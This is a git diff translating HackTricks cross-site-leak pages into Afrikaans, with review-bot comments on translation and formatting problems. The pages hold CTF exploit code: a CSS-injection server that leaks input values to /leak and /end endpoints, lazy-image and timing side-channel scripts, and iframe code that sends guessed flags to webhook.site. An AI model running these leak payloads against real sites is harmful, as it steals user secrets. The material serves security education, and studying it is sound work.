-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
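Review bot: the support footer in this hunk is translated differently from the identical footer in `css-injection-code.md` further down in the same patch: `github-opslag` here versus `github-opslagplekke` there (the plural is the right one for "repos"), and `As jy wil sien dat jou **maatskappy geadverteer word in HackTricks**` versus `As jy jou **maatskappy geadverteer wil sien in HackTricks**`. This boilerplate block is shared by every page, so it should be translated once and pasted verbatim; otherwise each file carries its own variant and every future sync of the template produces a diff in every page.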
diff --git a/pentesting-web/xs-search/css-injection/css-injection-code.md b/pentesting-web/xs-search/css-injection/css-injection-code.md index e288681dd..aa064a1f0 100644 --- a/pentesting-web/xs-search/css-injection/css-injection-code.md +++ b/pentesting-web/xs-search/css-injection/css-injection-code.md @@ -1,22 +1,22 @@ -# CSS Injection Code +# CSS Injeksie Kode
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} @@ -26,14 +26,12 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track ```html -

+

``` -{% endcode %} - {% code title="server.js" %} ```javascript const http = require('http'); 
@@ -50,82 +48,82 @@ var pending = []; var stop = false, ready = 0, n = 0; const requestHandler = (request, response) => { - let req = url.parse(request.url, url); - log('\treq: %s', request.url); - - //If stop, leakeage is finished - if (stop) return response.end(); - - switch (req.pathname) { - // This only launched when starting the leakeage - case "/start": - genResponse(response); - break; - - // Everytime something is leaked - case "/leak": - response.end(); - // If response comes with a pre, then we leaked some preffix s(E)cret - if (req.query.pre && prefix !== req.query.pre) { - prefix = req.query.pre; - - // If response comes with a post, then we leaked some suffix secre(T) - } else if (req.query.post && postfix !== req.query.post) { - postfix = req.query.post; - } else { - break; - } - - // Always a pre and a post response must arrived before responding the "next" @import (which is waiting for response) - if (ready == 2) { - genResponse(pending.shift()); - ready = 0; - } else { - ready++; - log('\tleak: waiting others...'); - } - break; - - // While waiting for a pre and a post, the next @import is waiting to be responded - // by a new generated payload with another "pre" and "post" - case "/next": - if (ready == 2) { - genResponse(respose); - ready = 0; - } else { - pending.push(response); - ready++; - log('\tquery: waiting others...'); - } - break; - - // Called when the secret is leaked - case "/end": - stop = true; - console.log('[+] END: %s', req.query.token); - - default: - response.end(); - } +let req = url.parse(request.url, url); +log('\treq: %s', request.url); + +//If stop, leakeage is finished +if (stop) return response.end(); + +switch (req.pathname) { +// This only launched when starting the leakeage +case "/start": +genResponse(response); +break; + +// Everytime something is leaked +case "/leak": +response.end(); +// If response comes with a pre, then we leaked some preffix s(E)cret +if (req.query.pre && prefix !== req.query.pre) { +prefix = 
req.query.pre; + +// If response comes with a post, then we leaked some suffix secre(T) +} else if (req.query.post && postfix !== req.query.post) { +postfix = req.query.post; +} else { +break; +} + +// Always a pre and a post response must arrived before responding the "next" @import (which is waiting for response) +if (ready == 2) { +genResponse(pending.shift()); +ready = 0; +} else { +ready++; +log('\tleak: waiting others...'); +} +break; + +// While waiting for a pre and a post, the next @import is waiting to be responded +// by a new generated payload with another "pre" and "post" +case "/next": +if (ready == 2) { +genResponse(respose); +ready = 0; +} else { +pending.push(response); +ready++; +log('\tquery: waiting others...'); +} +break; + +// Called when the secret is leaked +case "/end": +stop = true; +console.log('[+] END: %s', req.query.token); + +default: +response.end(); +} } const genResponse = (response) => { - // Verbose output to know what do we know - console.log('...pre-payoad: ' + prefix); - console.log('...post-payoad: ' + postfix); +// Verbose output to know what do we know +console.log('...pre-payoad: ' + prefix); +console.log('...post-payoad: ' + postfix); - // Payload generation, you have an example of what is generated below - let css = '@import url('+ HOSTNAME + '/next?' 
+ Math.random() + ');\n' + - [0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value$="' + e + postfix + '"]{--e'+n+':url(' + HOSTNAME + '/leak?post=' + e + postfix + ')}')).join('') + - 'div '.repeat(n) + 'input{background:var(--e'+n+')}' + - [0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value^="' + prefix + e + '"]{--s'+n+':url(' + HOSTNAME + '/leak?pre=' + prefix + e +')}')).join('') + - 'div '.repeat(n) + 'input{border-image:var(--s'+n+')}' + - 'input[value='+ prefix + postfix + ']{list-style:url(' + HOSTNAME + '/end?token=' + prefix + postfix + '&)};'; - - response.writeHead(200, { 'Content-Type': 'text/css'}); - response.write(css); - response.end(); - n++; +// Payload generation, you have an example of what is generated below +let css = '@import url('+ HOSTNAME + '/next?' + Math.random() + ');\n' + +[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value$="' + e + postfix + '"]{--e'+n+':url(' + HOSTNAME + '/leak?post=' + e + postfix + ')}')).join('') + +'div '.repeat(n) + 'input{background:var(--e'+n+')}' + +[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value^="' + prefix + e + '"]{--s'+n+':url(' + HOSTNAME + '/leak?pre=' + prefix + e +')}')).join('') + +'div '.repeat(n) + 'input{border-image:var(--s'+n+')}' + +'input[value='+ prefix + postfix + ']{list-style:url(' + HOSTNAME + '/end?token=' + prefix + postfix + '&)};'; + +response.writeHead(200, { 'Content-Type': 'text/css'}); +response.write(css); +response.end(); +n++; } 
@@ -133,14 +131,14 @@ const genResponse = (response) => { const server = http.createServer(requestHandler) server.listen(port, (err) => { - if (err) { - return console.log('[-] Error: something bad happened', err); - } - console.log('[+] Server is listening on %d', port); +if (err) { +return console.log('[-] Error: something bad happened', err); +} +console.log('[+] Server is listening on %d', port); }) function log() { - if (DEBUG) console.log.apply(console, arguments); +if (DEBUG) console.log.apply(console, arguments); } /* @@ -232,25 +230,24 @@ input[value^="f"]{--s0:url(http://localhost:5001/leak?pre=f)} input{border-image:var(--s0)} input[value=]{list-style:url(http://localhost:5001/end?token=&)}; */ -``` {% endcode %}
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
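Review bot: the `@@ -26,14 +26,12 @@` hunk removes `{% endcode %}` after the HTML block and the `@@ -232,25 +230,24 @@` hunk removes the closing triple-backtick fence in front of the remaining `{% endcode %}`, so the `server.js` code block is never terminated and the GitBook `{% code %}`/`{% endcode %}` tags no longer pair up; both removed lines should be restored. The `@@ -50,82 +48,82 @@` hunk also rewrites every line of the request handler only to strip its leading whitespace (`-    let req = url.parse(request.url, url);` becomes `+let req = url.parse(request.url, url);`), and `@@ -133,14 +131,14 @@` does the same to the `server.listen` callback and `log()`; a translation PR should not touch whitespace inside code blocks, and this makes the `switch` nesting unreadable. While re-adding those lines the hunk carries over the pre-existing typo `+genResponse(respose);` in the `/next` case, where `respose` is undefined, so that branch throws a ReferenceError once `ready == 2`; since the line is being rewritten anyway it should read `genResponse(response);`.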
diff --git a/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md b/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md index aee47f77d..5b1e1ea35 100644 --- a/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md +++ b/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md @@ -1,165 +1,163 @@ -# Event Loop Blocking + Lazy images +# Event Loop Blokkering + Luie beelde
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-In [**this exploit**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [**@aszx87410**](https://twitter.com/aszx87410) mixes the **lazy image side channel** technique through a HTML injection with kind of **event loop blocking technique** to leak chars. +In [**hierdie uitbuiting**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), meng [**@aszx87410**](https://twitter.com/aszx87410) die **luie beeld sykanaal**-tegniek deur 'n HTML-injeksie met 'n soort **event loop blokkeringstegniek** om karakters te lek. -This is a **different exploit for the CTF chall** that was already commented in the following page. take a look for more info about the challenge: +Dit is 'n **verskillende uitbuiting vir die CTF-uitdaging** wat reeds bespreek is op die volgende bladsy. Kyk vir meer inligting oor die uitdaging: {% content-ref url="connection-pool-example.md" %} [connection-pool-example.md](connection-pool-example.md) {% endcontent-ref %} -The idea behind this exploit is: +Die idee agter hierdie uitbuiting is as volg: -* The posts are loaded alphabetically -* An **attacker** can **inject** a **post** starting with **"A"**, then some **HTML tag** (like a big **` - - - -
- -
- - -
- -
- - +}, 0) + +async function testChar(str) { +return new Promise(resolve => { +/* +For 3350, you need to test it on your local to get this number. +The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold +If starts with "A", the image should be loaded because it's in the threshold. +*/ +// is experimental and allow to show the injected +// images when the post injected is the first one but to hide them when +// the injected post is after the post with the flag +inp.value = str + '

'+Array.from({length:20}).map((_,i)=>``).join('') +f.submit() + +setTimeout(() => { +run(str, resolve) +}, 500) +}) +} + +async function run(str, resolve) { +// Open posts page 5 times +for(let i=1; i<=5;i++) { +window.open(TARGET) +} + +let t = 0 +const round = 30 //Lets time 30 requests +setTimeout(async () => { +// Send 30 requests and time each +for(let i=0; i1) +let end = performance.now() +t += end - s +console.log(end - s) +} +const avg = t/round +// Send info about how much time it took +send(str + "," + t + "," + "avg:" + avg) + +/* +I get this threshold(1000ms) by trying multiple times on remote admin bot +for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold +*/ +const isFound = (t >= 1000) +if (isFound) { +inp2.value = "0" +} else { +inp2.value = "1" +} + +// remember to delete the post to not break our leak oracle +f2.submit() +setTimeout(() => { +resolve(isFound) +}, 200) +}, 200) +} + + ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
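Review bot: the `@@ -1,165 +1,163 @@` hunk strips the indentation from the whole exploit `<script>` block (`+}, 0)`, `+async function testChar(str) {`, `+return new Promise(resolve => {`), so the nesting of `testChar`, `run` and the nested `setTimeout` callbacks is lost; this is the same whitespace-only rewrite of code seen in the other files of this PR and the original indentation should be kept. In the prose the heading `+# Event Loop Blokkering + Luie beelde` translates only part of the term; either keep "Event Loop Blocking" as the technical name, as the linked `connection-pool-example.md` reference is kept, or translate it fully, but not half of it.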
diff --git a/pentesting-web/xs-search/javascript-execution-xs-leak.md b/pentesting-web/xs-search/javascript-execution-xs-leak.md index 035ff8782..bea9ff51c 100644 --- a/pentesting-web/xs-search/javascript-execution-xs-leak.md +++ b/pentesting-web/xs-search/javascript-execution-xs-leak.md @@ -1,92 +1,88 @@ -# JavaScript Execution XS Leak +# JavaScript Uitvoering XS-lek
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
- ```javascript // Code that will try ${guess} as flag (need rest of the server code app.get('/guessing', function(req, res) { - let guess = req.query.guess - let page = ` - - - - -

hello2

- ` - res.send(page) +let guess = req.query.guess +let page = ` + + + + +

hello2

+` +res.send(page) }); ``` - -Main page that generates iframes to the previous `/guessing` page to test each possibility - +Hoofblad wat iframes genereer na die vorige `/raai` bladsy om elke moontlikheid te toets ```html - +timerId = setInterval(() => { +if (candidateIsGood) { +flag = candidate +guessIndex = -1 +fetch('https://webhook.site/?flag='+flag) +} + +//Start with true and will be change to false if wrong +candidateIsGood = true +guessIndex++ +if (guessIndex >= flagChars.length) { +fetch('https://webhook.site/') +return +} +let guess = flagChars[guessIndex] +candidate = flag + guess +let iframe = `` +console.log('iframe: ', iframe) +hack.innerHTML = iframe +} +, 500); +

hello

``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
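Review bot: the translated line `+Hoofblad wat iframes genereer na die vorige `/raai` bladsy om elke moontlikheid te toets` renames the route, but the handler in the same hunk is still `app.get('/guessing', function(req, res) {`, so the inline code must stay `/guessing`; path and code identifiers are not to be translated. The hunk also drops the blank lines on both sides of that sentence (the `-` empty lines before and after `Main page that generates iframes ...`), gluing the prose to the two fences, and strips the indentation of the `/guessing` handler (`-    let guess = req.query.guess` to `+let guess = req.query.guess`) and of the `setInterval` body; restore the original whitespace and blank lines.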
diff --git a/pentesting-web/xs-search/performance.now-+-force-heavy-task.md b/pentesting-web/xs-search/performance.now-+-force-heavy-task.md index b6724a16e..3587f2435 100644 --- a/pentesting-web/xs-search/performance.now-+-force-heavy-task.md +++ b/pentesting-web/xs-search/performance.now-+-force-heavy-task.md @@ -1,25 +1,24 @@ -# performance.now + Force heavy task +# performance.now + Kragtige taak afdwing
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-**Exploit taken from [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)** +**Exploit geneem van [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)** -In this challenge the user could sent thousands of chars and if the flag was contained, the chars would be sent back to the bot. So putting a big amount of chars the attacker could measure if the flag was containing in the sent string or not. +In hierdie uitdaging kon die gebruiker duisende karakters stuur en as die vlag bevat was, sou die karakters teruggestuur word na die bot. Deur 'n groot hoeveelheid karakters te stuur, kon die aanvaller meet of die vlag in die gestuurde string voorkom of nie. {% hint style="warning" %} -Initially, I didn’t set object width and height, but later on, I found that it’s important because the default size is too small to make a difference in the load time. +Aanvanklik het ek nie die objekbreedte en -hoogte ingestel nie, maar later het ek gevind dat dit belangrik is omdat die verstekgrootte te klein is om 'n verskil in die laai-tyd te maak. {% endhint %} - ```html @@ -27,105 +26,102 @@ Initially, I didn’t set object width and height, but later on, I found that it - - +if (notFound > found) { +return +} + +// exploit +while(true) { +if (flag[flag.length - 1] === '}') { +break +} +for(let char of charset) { +let trying = flag + char +let time = 0 +for(let i=0; i<3; i++) { +time += await leak(trying) +} +time/=3 +send('char:'+trying+',time:'+time) +if (time >= threshold) { +flag += char +send(flag) +break +} +} +} +} + +main() + + ``` - - -
